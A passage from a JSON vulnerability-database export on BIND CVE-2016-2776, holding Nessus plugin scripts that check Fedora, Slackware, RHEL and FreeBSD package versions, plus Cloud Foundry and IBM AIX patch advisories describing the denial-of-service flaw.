audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"bind-9.10.4-2.P3.fc25\", epoch:\"32\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"32:bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T09:10:55", "description": "New bind packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, 14.2, and -current to fix a security issue.", "edition": 25, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-28T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : bind (SSA:2016-271-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-09-28T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:13.0", "p-cpe:/a:slackware:slackware_linux:bind", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2016-271-01.NASL", "href": "https://www.tenable.com/plugins/nessus/93742", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-271-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93742);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"SSA\", value:\"2016-271-01\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : bind (SSA:2016-271-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bind packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, 14.2, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.568983\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eab11c62\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.9_P3\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"bind\", pkgver:\"9.10.4_P3\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.10.4_P3\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bind\", pkgver:\"9.10.4_P3\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.10.4_P3\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-03-01T05:38:16", "description": "An update for bind97 is now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nSecurity Fix(es) :\n\n* A denial of service flaw was found in the way BIND constructed a\nresponse to a query that met certain criteria. A remote attacker could\nuse this flaw to make named exit unexpectedly with an assertion\nfailure via a specially crafted DNS request packet. (CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-28T00:00:00", "title": "RHEL 5 : bind97 (RHSA-2016:1945)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bind97-chroot", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:bind97-libs", "p-cpe:/a:redhat:enterprise_linux:bind97-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bind97", "p-cpe:/a:redhat:enterprise_linux:bind97-utils", "p-cpe:/a:redhat:enterprise_linux:bind97-devel"], "id": "REDHAT-RHSA-2016-1945.NASL", "href": "https://www.tenable.com/plugins/nessus/93785", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:1945. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93785);\n script_version(\"2.15\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"RHSA\", value:\"2016:1945\");\n\n script_name(english:\"RHEL 5 : bind97 (RHSA-2016:1945)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for bind97 is now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nSecurity Fix(es) :\n\n* A denial of service flaw was found in the way BIND constructed a\nresponse to a query that met certain criteria. A remote attacker could\nuse this flaw to make named exit unexpectedly with an assertion\nfailure via a specially crafted DNS request packet. (CVE-2016-2776)\n\nRed Hat would like to thank ISC for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/article/AA-01419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:1945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-2776\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind97-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:1945\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-chroot-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-debuginfo-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-devel-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind97-libs-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.7\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind97-utils-9.7.0-21.P2.el5_11.7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind97 / bind97-chroot / bind97-debuginfo / bind97-devel / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T10:58:08", "description": "ISC reports :\n\nTesting by ISC has uncovered a critical error condition which can\noccur when a nameserver is constructing a response. A defect in the\nrendering of messages into packets can cause named to exit with an\nassertion failure in buffer.c while constructing a response to a query\nthat meets certain criteria.", "edition": 33, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-28T00:00:00", "title": "FreeBSD : BIND -- Remote Denial of Service vulnerability (c8d902b1-8550-11e6-81e7-d050996490d0)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-09-28T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:bind911", "p-cpe:/a:freebsd:freebsd:bind9-devel", "p-cpe:/a:freebsd:freebsd:bind99", "p-cpe:/a:freebsd:freebsd:bind910"], "id": "FREEBSD_PKG_C8D902B1855011E681E7D050996490D0.NASL", "href": "https://www.tenable.com/plugins/nessus/93781", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93781);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:28.bind\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"FreeBSD : BIND -- Remote Denial of Service vulnerability (c8d902b1-8550-11e6-81e7-d050996490d0)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC reports :\n\nTesting by ISC has uncovered a critical error condition which can\noccur when a nameserver is constructing a response. A defect in the\nrendering of messages into packets can cause named to exit with an\nassertion failure in buffer.c while constructing a response to a query\nthat meets certain criteria.\"\n );\n # https://kb.isc.org/article/AA-01419\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01419\"\n );\n # https://vuxml.freebsd.org/freebsd/c8d902b1-8550-11e6-81e7-d050996490d0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6cca01ef\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind9-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind910\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind911\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bind99\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"bind99<9.9.9P3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bind910<9.10.4P3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bind911<9.11.0.rc3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bind9-devel<9.12.0.a.2016.09.10\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:01", "bulletinFamily": "software", "cvelist": ["CVE-2016-2776"], "description": "USN-3088-1: Bind vulnerability\n\n# \n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04 LTS \n\n# Description\n\nIt was discovered that Bind incorrectly handled building responses to certain specially crafted requests. A remote attacker could possibly use this issue to cause Bind to crash, resulting in a denial of service.\n\n# Affected Products and Versions\n\n_Severity is medium unless otherwise noted. \n_\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * All versions prior to 3151.5 \n * 3233.x versions prior to 3233.6 \n * 3263.x versions prior to 3263.12 \n * 3312.x versions prior to 3312.7 \n * All other versions \n * All versions of Cloud Foundry cflinuxfs2 prior to v.1.85.0 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry team recommends upgrading to the following BOSH stemcells: \n * Upgrade all lower versions of 3151.x to version 3151.5 \n * Upgrade all lower versions of 3233.x to version 3233.6 \n * Upgrade all lower versions of 3263.x to version 3263.12 \n * Upgrade all lower versions of 3312.x to version 3312.7 \n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 v.1.85.0 or later versions \n\n# References\n\n * <https://www.ubuntu.com/usn/usn-3088-1/>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-2776.html>\n", "edition": 5, "modified": "2016-12-13T00:00:00", "published": "2016-12-13T00:00:00", "id": "CFOUNDRY:DE630CF7E67472C9EFB46DD5E3E29439", "href": "https://www.cloudfoundry.org/blog/usn-3088-1/", "title": "USN-3088-1: Bind vulnerability | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "aix": [{"lastseen": "2020-04-22T00:52:07", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2775", "CVE-2016-2776"], "description": "\nIBM SECURITY ADVISORY\n\nFirst Issued: Fri Nov 18 08:19:36 CST 2016\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc\nhttps://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc\nftp://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc\n\n\nSecurity Bulletin: Vulnerabilities in BIND impact AIX (CVE-2016-2776 and\n CVE-2016-2775)\n\n\n===============================================================================\n\nSUMMARY:\n\n There are two vulnerabilities in BIND that impact AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2016-2776 \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2776\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2776\n DESCRIPTION: ISC BIND is vulnerable to a denial of service, caused by an\n assertion failure in buffer.c while a nameserver is building responses\n to a specifically constructed request. By sending a specially crafted\n DNS packet, a remote attacker could exploit this vulnerability to make\n named exit unexpectedly with an assertion failure. \n CVSS Base Score: 7.5 \n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/117246 for the\n current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n \n CVEID: CVE-2016-2775\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2775\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2775\n DESCRIPTION: ISC BIND is vulnerable to a denial of service, caused by an\n error when lwresd or the named lwres option is enabled. By sending\n an overly long request, a remote attacker could exploit this\n vulnerability to cause the daemon to crash.\n CVSS Base Score: 7.5\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/115477 for the\n current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n 